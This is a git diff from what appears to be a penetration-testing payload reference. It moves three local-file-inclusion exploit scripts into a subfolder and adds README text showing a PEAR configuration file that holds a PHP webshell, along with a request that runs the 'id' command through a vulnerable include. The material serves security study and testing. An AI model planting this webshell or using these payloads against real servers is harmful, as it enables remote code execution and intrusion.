diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/Files/LFI2RCE.py
similarity index 100%
rename from File Inclusion/LFI2RCE.py
rename to File Inclusion/Files/LFI2RCE.py
diff --git a/File Inclusion/phpinfolfi.py b/File Inclusion/Files/phpinfolfi.py
similarity index 100%
rename from File Inclusion/phpinfolfi.py
rename to File Inclusion/Files/phpinfolfi.py
diff --git a/File Inclusion/uploadlfi.py b/File Inclusion/Files/uploadlfi.py
similarity index 100%
rename from File Inclusion/uploadlfi.py
rename to File Inclusion/Files/uploadlfi.py
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 9fece48..566245d 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -520,6 +520,13 @@ There are two ways to exploit it.
   /vuln.php?file=/tmp/exec.php&c=id
   ```
 
+The created configuration file contains the webshell.
+
+```php
+#PEAR_Config 0.9
+a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
+```
+
 
 ## LFI to RCE via credentials files